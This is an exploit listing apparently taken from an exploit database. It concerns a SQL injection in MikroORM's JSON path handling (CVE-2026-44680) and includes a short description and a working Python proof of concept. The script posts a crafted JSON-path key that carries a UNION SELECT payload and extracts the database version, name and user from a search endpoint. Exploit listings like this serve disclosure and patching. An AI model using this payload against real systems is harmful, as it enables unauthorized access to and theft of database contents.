Share
## https://sploitus.com/exploit?id=PACKETSTORM:222199
# Exploit Title: MikroORM   7.0.13 - SQL Injection 
    # Google Dork: N/A
    # Date: 2026-05-27
    # Exploit Author: cardosource
    # Vendor Homepage: https://mikro-orm.io/
    # Software Link: https://github.com/mikro-orm/mikro-orm
    # Version: @mikro-orm/knex <= 6.6.13 / @mikro-orm/sql <= 7.0.13
    # Tested on: Docker / Debian Bookworm / Node.js 18 / MariaDB 10.x
    # CVE: CVE-2026-44680
    # Advisory: https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-cfw5-68c4-ffqp
    
    """
    Description:
    The vulnerability exists because MikroORM fails to properly escape
    runtime-controlled JSON path keys when building JSON_EXTRACT queries.
    
    The attacker can break out of the JSON path context and inject arbitrary SQL.
    
    Affected API pattern:
    
    em.find(Entity, {
        jsonColumn: {
            [userControlledKey]: value
        }
    })
    
    
    By injecting crafted JSON-path keys, it becomes possible to execute
    UNION SELECT statements and extract arbitrary database information.
    """
    
    import requests
    import json
    
    url = "http://localhost:3000/api/users/search"
    
    payload = {
        "filterField": "$.x' ) OR 1=1 UNION SELECT @@version, DATABASE(), USER(), @@version_comment -- ",
        "filterValue": "x"
    }
    
    headers = {
        "Content-Type": "application/json"
    }
    
    response = requests.post(url, json=payload, headers=headers)
    
    print(f"Status: {response.status_code}")
    print(json.dumps(response.json(), indent=2))